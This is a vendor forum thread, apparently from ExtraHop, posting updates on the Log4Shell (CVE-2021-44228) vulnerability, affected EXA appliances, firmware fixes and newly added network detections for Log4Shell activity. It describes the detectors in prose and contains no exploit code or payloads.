ExtraHop Update on Log4Shell

In addition to the Threat Briefing already delivered, the ExtraHop team is continuing work on detectors for the critical Log4Shell issue (CVE-2021-44228).

No ExtraHop sensors are vulnerable except EXA sensors.
EXA sensors contain vulnerable log4j code but are not vulnerable to the Remote Code Execution attack. It is theoretically possible that EXAs are vulnerable to an information leakage attack but we have not yet found a vector for an unauthenticated information leak.

New firmware releases are in flight. If an immediate fix is desired there is a Support Pack available that will make the same fix as the firmware. Contact Support to obtain the Support Pack.

3 Likes

Update:

There has been some information that remote code execution is possible against some versions of Java that were previously believed to be protected.

ExtraHop still believes sensors are not vulnerable to unauthenticated attacks.

The ExtraHop team continues to work on new ways to detect the critical Log4Shell issue. Watch this thread for updates.

2 Likes

Update on ExtraHop Explore appliance and ExtraHop functionality

Log4Shell is a remote code execution (RCE) vulnerability in Apache Log4j2. Thousands of enterprise applications, cloud applications, and services depend on Log4j, which is an open source Java logging library. This zero-day vulnerability (CVE-2021-44228) is being actively exploited.

As previously stated, the vulnerability only affects Explore appliances.

ExtraHop has released a number of deliverables in response to the Log4Shell vulnerability. We recommend that all customers upgrade to the latest available firmware.

  • We released a Threat Briefing last week to all Reveal(x) deployments connected to online services.

  • We published a blog post last week.

  • We published a forum post last week.

  • We released firmware versions 8.5.4 and 8.6.5 on Monday, December 13th, and will release firmware version 8.7 in the next week. These releases address the Log4Shell vulnerability in the Explore appliance and add the following functionality to enhance the ExtraHop system’s ability to detect Log4Shell attempts:

    • Added LDAP traffic classification to all ports, which enables External LDAP Connections.
    • Added IIOP and Java RMI traffic classification, which helps to identify Log4Shell over these protocols.
  • Updated the Unusual Executable File Download for .class file detection. This detection identifies Java applications that are retrieving code to execute from a remote host.

  • Added the Request to External LDAP Server detection. This detection identifies LDAP connections made to an external server.

  • Added the Log4Shell JNDI Injection Attempt detection. This detection identifies attempts to inject jndi: strings.

  • Added the Outbound Log4shell Activity detection. This detection identifies any outbound activity generated from the attempts that were seen by the Injection Attempt detector.

  • The Threat Briefing has been updated to include the above detectors.

  • We are planning a courtesy firmware update for 8.4 later this week even though it is outside of our software development lifecycle. This release only addresses the vulnerability for the Explore appliance, but does not include other updates.

  • For versions older than 8.4, a Support script is available to mitigate the Log4Shell vulnerability. Please contact Support for assistance.

Please watch the forum and blog posts for further updates!

1 Like

Update

Firmware 8.4.7 has now been released.

This is a security release only to address the Log4j remote code execution vulnerability (CVE-2021-44228).

ExtraHop is aware of CVE-2021-45046 and that log4j has released version 2.16.0.

At this time, ExtraHop does not believe 8.5.4 and 8.6.5 appliances are vulnerable.

If the situation changes, we will update this thread.

Update:

Firmware version 8.7 was released Friday. Read the What’s New blog post.

The team is continuing research on log4shell. Look for additional information in the product.

ExtraHop is aware of even more bypasses to log4j and we recommend users upgrade to one of 8.4.7, 8.5.4, 8.6.5 or 8.7.

Hi Costlow, do you know what is the Log4j version and if there is any JNDI component used in EXA?

Please contact Support for exact version numbers.
Version 8.7 removed JndiLookup.class.